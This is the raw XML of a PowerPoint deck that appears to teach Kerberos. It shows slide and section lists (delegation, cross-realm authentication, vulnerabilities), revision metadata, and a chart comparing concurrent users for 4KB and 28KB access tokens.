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rts/chart1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+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4"/>
    <p:sldMasterId id="2147483815" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId157"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="494" r:id="rId7"/>
    <p:sldId id="325" r:id="rId8"/>
    <p:sldId id="350" r:id="rId9"/>
    <p:sldId id="338" r:id="rId10"/>
    <p:sldId id="339" r:id="rId11"/>
    <p:sldId id="395" r:id="rId12"/>
    <p:sldId id="340" r:id="rId13"/>
    <p:sldId id="447" r:id="rId14"/>
    <p:sldId id="448" r:id="rId15"/>
    <p:sldId id="341" r:id="rId16"/>
    <p:sldId id="347" r:id="rId17"/>
    <p:sldId id="348" r:id="rId18"/>
    <p:sldId id="342" r:id="rId19"/>
    <p:sldId id="470" r:id="rId20"/>
    <p:sldId id="343" r:id="rId21"/>
    <p:sldId id="344" r:id="rId22"/>
    <p:sldId id="345" r:id="rId23"/>
    <p:sldId id="436" r:id="rId24"/>
    <p:sldId id="437" r:id="rId25"/>
    <p:sldId id="322" r:id="rId26"/>
    <p:sldId id="330" r:id="rId27"/>
    <p:sldId id="385" r:id="rId28"/>
    <p:sldId id="321" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="270" r:id="rId31"/>
    <p:sldId id="271" r:id="rId32"/>
    <p:sldId id="349" r:id="rId33"/>
    <p:sldId id="492" r:id="rId34"/>
    <p:sldId id="272" r:id="rId35"/>
    <p:sldId id="493" r:id="rId36"/>
    <p:sldId id="317" r:id="rId37"/>
    <p:sldId id="318" r:id="rId38"/>
    <p:sldId id="466" r:id="rId39"/>
    <p:sldId id="319" r:id="rId40"/>
    <p:sldId id="467" r:id="rId41"/>
    <p:sldId id="276" r:id="rId42"/>
    <p:sldId id="320" r:id="rId43"/>
    <p:sldId id="279" r:id="rId44"/>
    <p:sldId id="280" r:id="rId45"/>
    <p:sldId id="281" r:id="rId46"/>
    <p:sldId id="282" r:id="rId47"/>
    <p:sldId id="283" r:id="rId48"/>
    <p:sldId id="284" r:id="rId49"/>
    <p:sldId id="285" r:id="rId50"/>
    <p:sldId id="446" r:id="rId51"/>
    <p:sldId id="469" r:id="rId52"/>
    <p:sldId id="468" r:id="rId53"/>
    <p:sldId id="359" r:id="rId54"/>
    <p:sldId id="459" r:id="rId55"/>
    <p:sldId id="396" r:id="rId56"/>
    <p:sldId id="287" r:id="rId57"/>
    <p:sldId id="288" r:id="rId58"/>
    <p:sldId id="289" r:id="rId59"/>
    <p:sldId id="290" r:id="rId60"/>
    <p:sldId id="291" r:id="rId61"/>
    <p:sldId id="488" r:id="rId62"/>
    <p:sldId id="357" r:id="rId63"/>
    <p:sldId id="397" r:id="rId64"/>
    <p:sldId id="356" r:id="rId65"/>
    <p:sldId id="465" r:id="rId66"/>
    <p:sldId id="358" r:id="rId67"/>
    <p:sldId id="481" r:id="rId68"/>
    <p:sldId id="360" r:id="rId69"/>
    <p:sldId id="361" r:id="rId70"/>
    <p:sldId id="406" r:id="rId71"/>
    <p:sldId id="434" r:id="rId72"/>
    <p:sldId id="461" r:id="rId73"/>
    <p:sldId id="398" r:id="rId74"/>
    <p:sldId id="362" r:id="rId75"/>
    <p:sldId id="460" r:id="rId76"/>
    <p:sldId id="463" r:id="rId77"/>
    <p:sldId id="464" r:id="rId78"/>
    <p:sldId id="435" r:id="rId79"/>
    <p:sldId id="450" r:id="rId80"/>
    <p:sldId id="433" r:id="rId81"/>
    <p:sldId id="399" r:id="rId82"/>
    <p:sldId id="352" r:id="rId83"/>
    <p:sldId id="293" r:id="rId84"/>
    <p:sldId id="294" r:id="rId85"/>
    <p:sldId id="295" r:id="rId86"/>
    <p:sldId id="296" r:id="rId87"/>
    <p:sldId id="353" r:id="rId88"/>
    <p:sldId id="354" r:id="rId89"/>
    <p:sldId id="432" r:id="rId90"/>
    <p:sldId id="428" r:id="rId91"/>
    <p:sldId id="429" r:id="rId92"/>
    <p:sldId id="430" r:id="rId93"/>
    <p:sldId id="431" r:id="rId94"/>
    <p:sldId id="421" r:id="rId95"/>
    <p:sldId id="327" r:id="rId96"/>
    <p:sldId id="426" r:id="rId97"/>
    <p:sldId id="427" r:id="rId98"/>
    <p:sldId id="400" r:id="rId99"/>
    <p:sldId id="472" r:id="rId100"/>
    <p:sldId id="473" r:id="rId101"/>
    <p:sldId id="329" r:id="rId102"/>
    <p:sldId id="364" r:id="rId103"/>
    <p:sldId id="365" r:id="rId104"/>
    <p:sldId id="384" r:id="rId105"/>
    <p:sldId id="440" r:id="rId106"/>
    <p:sldId id="405" r:id="rId107"/>
    <p:sldId id="366" r:id="rId108"/>
    <p:sldId id="388" r:id="rId109"/>
    <p:sldId id="389" r:id="rId110"/>
    <p:sldId id="390" r:id="rId111"/>
    <p:sldId id="391" r:id="rId112"/>
    <p:sldId id="393" r:id="rId113"/>
    <p:sldId id="394" r:id="rId114"/>
    <p:sldId id="407" r:id="rId115"/>
    <p:sldId id="408" r:id="rId116"/>
    <p:sldId id="409" r:id="rId117"/>
    <p:sldId id="443" r:id="rId118"/>
    <p:sldId id="410" r:id="rId119"/>
    <p:sldId id="471" r:id="rId120"/>
    <p:sldId id="308" r:id="rId121"/>
    <p:sldId id="442" r:id="rId122"/>
    <p:sldId id="401" r:id="rId123"/>
    <p:sldId id="402" r:id="rId124"/>
    <p:sldId id="403" r:id="rId125"/>
    <p:sldId id="404" r:id="rId126"/>
    <p:sldId id="411" r:id="rId127"/>
    <p:sldId id="412" r:id="rId128"/>
    <p:sldId id="413" r:id="rId129"/>
    <p:sldId id="333" r:id="rId130"/>
    <p:sldId id="414" r:id="rId131"/>
    <p:sldId id="477" r:id="rId132"/>
    <p:sldId id="479" r:id="rId133"/>
    <p:sldId id="474" r:id="rId134"/>
    <p:sldId id="480" r:id="rId135"/>
    <p:sldId id="478" r:id="rId136"/>
    <p:sldId id="368" r:id="rId137"/>
    <p:sldId id="369" r:id="rId138"/>
    <p:sldId id="370" r:id="rId139"/>
    <p:sldId id="371" r:id="rId140"/>
    <p:sldId id="372" r:id="rId141"/>
    <p:sldId id="373" r:id="rId142"/>
    <p:sldId id="374" r:id="rId143"/>
    <p:sldId id="375" r:id="rId144"/>
    <p:sldId id="376" r:id="rId145"/>
    <p:sldId id="377" r:id="rId146"/>
    <p:sldId id="378" r:id="rId147"/>
    <p:sldId id="379" r:id="rId148"/>
    <p:sldId id="380" r:id="rId149"/>
    <p:sldId id="381" r:id="rId150"/>
    <p:sldId id="422" r:id="rId151"/>
    <p:sldId id="423" r:id="rId152"/>
    <p:sldId id="424" r:id="rId153"/>
    <p:sldId id="425" r:id="rId154"/>
    <p:sldId id="484" r:id="rId155"/>
    <p:sldId id="485" r:id="rId1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FED53A1-76D1-4800-A844-3268D99B5D25}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="494"/>
            <p14:sldId id="325"/>
            <p14:sldId id="350"/>
            <p14:sldId id="338"/>
            <p14:sldId id="339"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Overview" id="{76C6387D-0F0F-4BBD-B478-A4AD78A81517}">
          <p14:sldIdLst>
            <p14:sldId id="395"/>
            <p14:sldId id="340"/>
            <p14:sldId id="447"/>
            <p14:sldId id="448"/>
            <p14:sldId id="341"/>
            <p14:sldId id="347"/>
            <p14:sldId id="348"/>
            <p14:sldId id="342"/>
            <p14:sldId id="470"/>
            <p14:sldId id="343"/>
            <p14:sldId id="344"/>
            <p14:sldId id="345"/>
            <p14:sldId id="436"/>
            <p14:sldId id="437"/>
            <p14:sldId id="322"/>
            <p14:sldId id="330"/>
            <p14:sldId id="385"/>
            <p14:sldId id="321"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Physical Structure" id="{7550297A-5B7A-4A99-84CB-4FF820DF579B}">
          <p14:sldIdLst>
            <p14:sldId id="268"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
            <p14:sldId id="349"/>
            <p14:sldId id="492"/>
            <p14:sldId id="272"/>
            <p14:sldId id="493"/>
            <p14:sldId id="317"/>
            <p14:sldId id="318"/>
            <p14:sldId id="466"/>
            <p14:sldId id="319"/>
            <p14:sldId id="467"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Processes and Interactions" id="{15C068C7-72E3-4477-9AA3-FDE72A832183}">
          <p14:sldIdLst>
            <p14:sldId id="276"/>
            <p14:sldId id="320"/>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="283"/>
            <p14:sldId id="284"/>
            <p14:sldId id="285"/>
            <p14:sldId id="446"/>
            <p14:sldId id="469"/>
            <p14:sldId id="468"/>
            <p14:sldId id="359"/>
            <p14:sldId id="459"/>
            <p14:sldId id="396"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="289"/>
            <p14:sldId id="290"/>
            <p14:sldId id="291"/>
            <p14:sldId id="488"/>
            <p14:sldId id="357"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Why Kerberos?" id="{32957ADC-B2BD-4D2E-A978-85FD83289858}">
          <p14:sldIdLst>
            <p14:sldId id="397"/>
            <p14:sldId id="356"/>
            <p14:sldId id="465"/>
            <p14:sldId id="358"/>
            <p14:sldId id="481"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
            <p14:sldId id="406"/>
            <p14:sldId id="434"/>
            <p14:sldId id="461"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="MaxTokenSize" id="{FF223DBE-3AE9-4E48-8210-C0A9B1C202FB}">
          <p14:sldIdLst>
            <p14:sldId id="398"/>
            <p14:sldId id="362"/>
            <p14:sldId id="460"/>
            <p14:sldId id="463"/>
            <p14:sldId id="464"/>
            <p14:sldId id="435"/>
            <p14:sldId id="450"/>
            <p14:sldId id="433"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Cross Realm Authentication" id="{FB615AC4-53AD-4E9C-8C92-24357F505EDC}">
          <p14:sldIdLst>
            <p14:sldId id="399"/>
            <p14:sldId id="352"/>
            <p14:sldId id="293"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="296"/>
            <p14:sldId id="353"/>
            <p14:sldId id="354"/>
            <p14:sldId id="432"/>
            <p14:sldId id="428"/>
            <p14:sldId id="429"/>
            <p14:sldId id="430"/>
            <p14:sldId id="431"/>
            <p14:sldId id="421"/>
            <p14:sldId id="327"/>
            <p14:sldId id="426"/>
            <p14:sldId id="427"/>
            <p14:sldId id="400"/>
            <p14:sldId id="472"/>
            <p14:sldId id="473"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Unconstraint Delegation" id="{72D6AF7E-22E8-42FE-A6DB-507F7E97FB38}">
          <p14:sldIdLst>
            <p14:sldId id="329"/>
            <p14:sldId id="364"/>
            <p14:sldId id="365"/>
            <p14:sldId id="384"/>
            <p14:sldId id="440"/>
            <p14:sldId id="405"/>
            <p14:sldId id="366"/>
            <p14:sldId id="388"/>
            <p14:sldId id="389"/>
            <p14:sldId id="390"/>
            <p14:sldId id="391"/>
            <p14:sldId id="393"/>
            <p14:sldId id="394"/>
            <p14:sldId id="407"/>
            <p14:sldId id="408"/>
            <p14:sldId id="409"/>
            <p14:sldId id="443"/>
            <p14:sldId id="410"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Constraint Delegation" id="{037740D3-42A7-4385-B981-BB60280AAE92}">
          <p14:sldIdLst>
            <p14:sldId id="471"/>
            <p14:sldId id="308"/>
            <p14:sldId id="442"/>
            <p14:sldId id="401"/>
            <p14:sldId id="402"/>
            <p14:sldId id="403"/>
            <p14:sldId id="404"/>
            <p14:sldId id="411"/>
            <p14:sldId id="412"/>
            <p14:sldId id="413"/>
            <p14:sldId id="333"/>
            <p14:sldId id="414"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="What's new in 2012" id="{9F7236DD-D341-4458-A2AC-0042E8CE5DD8}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Vulnerabilities" id="{452B7714-C2C4-4433-8B39-C97A6FF122CF}">
          <p14:sldIdLst>
            <p14:sldId id="477"/>
            <p14:sldId id="479"/>
            <p14:sldId id="474"/>
            <p14:sldId id="480"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Appendix" id="{3D2DC277-325C-4FEF-BEFF-49F985EE5A1A}">
          <p14:sldIdLst>
            <p14:sldId id="478"/>
            <p14:sldId id="368"/>
            <p14:sldId id="369"/>
            <p14:sldId id="370"/>
            <p14:sldId id="371"/>
            <p14:sldId id="372"/>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="375"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379"/>
            <p14:sldId id="380"/>
            <p14:sldId id="381"/>
            <p14:sldId id="422"/>
            <p14:sldId id="423"/>
            <p14:sldId id="424"/>
            <p14:sldId id="425"/>
            <p14:sldId id="484"/>
            <p14:sldId id="48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949B"/>
    <a:srgbClr val="FFBF86"/>
    <a:srgbClr val="FF9929"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="00EE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41" autoAdjust="0"/>
    <p:restoredTop sz="53050" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="2508" y="66"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-13518"/>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88" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="3822"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viewProps" Target="viewProp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theme" Target="theme/theme1.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notesMaster" Target="notesMasters/notesMaster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imund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-25T12:11:05.676" v="15" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-24T14:04:13.981" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4202291971" sldId="358"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-24T14:04:13.981" v="1"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4202291971" sldId="358"/>
            <ac:graphicFrameMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-25T12:11:05.676" v="15" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3905039835" sldId="412"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-25T12:11:05.676" v="15" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3905039835" sldId="412"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-25T07:54:09.375" v="7" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2701479841" sldId="472"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-25T07:54:09.375" v="7" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2701479841" sldId="472"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-24T12:35:40.383" v="0" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1305824890" sldId="488"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andrée" userId="0cf943988599aae0" providerId="LiveId" clId="{F7DF6DB1-F1EF-4725-8AFE-77A11631C696}" dt="2019-10-24T12:35:40.383" v="0" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1305824890" sldId="488"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{7F0AC274-EDB8-4D9C-8FAC-29F6CC1B352F}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{7F0AC274-EDB8-4D9C-8FAC-29F6CC1B352F}" dt="2023-03-08T09:19:37.118" v="54" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{7F0AC274-EDB8-4D9C-8FAC-29F6CC1B352F}" dt="2023-03-08T09:01:00.382" v="14" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2497572742" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{7F0AC274-EDB8-4D9C-8FAC-29F6CC1B352F}" dt="2023-03-08T09:01:00.382" v="14" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2497572742" sldId="322"/>
            <ac:spMk id="37" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{7F0AC274-EDB8-4D9C-8FAC-29F6CC1B352F}" dt="2023-03-08T08:32:45.320" v="12" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4005554003" sldId="341"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{7F0AC274-EDB8-4D9C-8FAC-29F6CC1B352F}" dt="2023-03-08T08:32:45.320" v="12" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4005554003" sldId="341"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{7F0AC274-EDB8-4D9C-8FAC-29F6CC1B352F}" dt="2023-03-08T09:19:37.118" v="54" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2048861483" sldId="493"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{7F0AC274-EDB8-4D9C-8FAC-29F6CC1B352F}" dt="2023-03-08T09:19:37.118" v="54" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2048861483" sldId="493"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{B9524370-E0D7-48FE-BBA4-04AABA163EBC}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{B9524370-E0D7-48FE-BBA4-04AABA163EBC}" dt="2021-10-28T11:52:00.769" v="2" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{B9524370-E0D7-48FE-BBA4-04AABA163EBC}" dt="2021-10-28T08:35:03.648" v="1" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2497572742" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{B9524370-E0D7-48FE-BBA4-04AABA163EBC}" dt="2021-10-28T08:35:02.714" v="0" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2497572742" sldId="322"/>
            <ac:spMk id="55" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{B9524370-E0D7-48FE-BBA4-04AABA163EBC}" dt="2021-10-28T08:35:03.648" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2497572742" sldId="322"/>
            <ac:spMk id="58" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{B9524370-E0D7-48FE-BBA4-04AABA163EBC}" dt="2021-10-28T11:52:00.769" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3405955335" sldId="465"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{B9524370-E0D7-48FE-BBA4-04AABA163EBC}" dt="2021-10-28T11:52:00.769" v="2" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3405955335" sldId="465"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{F8AD6DC9-1C72-4325-8612-E7DC2ED68156}"/>
    <pc:docChg chg="addSld modSection">
      <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{F8AD6DC9-1C72-4325-8612-E7DC2ED68156}" dt="2023-02-07T07:59:07.985" v="0" actId="2890"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="add">
        <pc:chgData name="Raimund Andree" userId="3ace8d6b453ded80" providerId="LiveId" clId="{F8AD6DC9-1C72-4325-8612-E7DC2ED68156}" dt="2023-02-07T07:59:07.985" v="0" actId="2890"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1628105456" sldId="494"/>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Number of Concurrent Users Possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Server scalability with access token sizes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Assumes 8 tokens/connections per user</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:layoutTarget val="inner"/>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.21396946475440662"/>
          <c:y val="0.22388020833333341"/>
          <c:w val="0.58915483220847864"/>
          <c:h val="0.74747395833333363"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>4KB Tokens</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:shade val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>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120MB PP dedicated
to tokens</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>60MB PP dedicated
to tokens</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$3</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>3840</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1920</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-B9E0-4393-908C-78E38DAD1056}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>28KB Tokens</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:shade val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>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120MB PP dedicated
to tokens</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>60MB PP dedicated
to tokens</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$C$2:$C$3</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>548</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>274</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-B9E0-4393-908C-78E38DAD1056}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="328451816"/>
        <c:axId val="276127320"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="328451816"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="0"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="276127320"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
